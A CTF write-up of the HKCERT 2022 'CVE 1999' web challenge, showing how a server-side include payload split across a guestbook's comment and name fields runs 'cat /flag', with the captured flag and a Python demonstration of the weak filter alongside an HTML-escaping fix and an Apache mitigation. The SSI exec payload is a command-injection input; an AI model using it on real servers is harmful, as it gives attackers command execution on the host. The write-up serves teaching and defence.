HKCERT CTF 2022 Writeup - CVE 1999

Web

CVE 1999 (199 points)

Description

Old news is so existing
Web: http://chal-a.hkcert22.pwnable.hk:28229/~matt/guestbook.html, http://chal-b.hkcert22.pwnable.hk:28229/~matt/guestbook.html
Remark: The guestbook will be cleaned up per minute

The given web link leads to a guestbook where we can add entries. In addition, by googling CVE 1999, we can find an exploit for this app: https://www.exploit-db.com/exploits/9907. I tried to run it, but no reverse shell came back.

After further testing, it seems that we can't inject the closing tag of the SSI directive. We have to put the closing tag in the name field for some reason, so the payload is:

In the comments field:

<!--#exec cmd="cat /flag"

In the name field:

-->
Flag:

hkcert22{DiDu_c0opy_others_FLags_or_c0rnment_brb_Tags}
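
One possible explanation for why the closing tag had to go into the name field, as an added example that is not part of the original writeup or the guestbook's own code: it assumes the application deletes only complete `<!-- ... -->` comments from each field separately and writes the comments before the name. `weak_clean`, `render_entry`, `has_ssi_directive` and `hardened_entry` are hypothetical names. The check runs on the assembled entry, which is what the SSI-enabled server parses, and the hardened variant encodes every field.

```python
import html
import re

# Assumed filter: removes a comment only when it opens and closes in the same field.
COMPLETE_COMMENT = re.compile(r"<!--.*?-->", re.DOTALL)
# Opening of an SSI directive in the assembled page fragment.
SSI_OPEN = re.compile(r"<!--#")

def weak_clean(value: str) -> str:
    """Per-field filter (assumption): strip complete HTML comments only."""
    return COMPLETE_COMMENT.sub("", value)

def render_entry(comments: str, name: str) -> str:
    """Hypothetical entry template: comments are written before the name."""
    return f"<b>{comments}</b><br>\n<b>{name}</b><hr>\n"

def has_ssi_directive(fragment: str) -> bool:
    """Inspect the assembled fragment, not the individual fields."""
    return SSI_OPEN.search(fragment) is not None

def weak_entry(comments: str, name: str) -> str:
    """Entry as produced when each field is filtered on its own."""
    return render_entry(weak_clean(comments), weak_clean(name))

def hardened_entry(comments: str, name: str) -> str:
    """Encode every field so '<', '>' and quotes reach the page as text."""
    return render_entry(html.escape(comments), html.escape(name))

# The two field values from the writeup above.
COMMENTS = '<!--#exec cmd="cat /flag"'
NAME = "-->"

if __name__ == "__main__":
    closed_in_one_field = COMMENTS + " " + NAME
    print("one field, weak filter  :", has_ssi_directive(weak_entry(closed_in_one_field, "matt")))
    print("two fields, weak filter :", has_ssi_directive(weak_entry(COMMENTS, NAME)))
    print("two fields, encoded     :", has_ssi_directive(hardened_entry(COMMENTS, NAME)))
```

On Apache, `Options IncludesNOEXEC` additionally disables `exec cmd` in SSI-parsed pages.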

SunnyLo
HK Student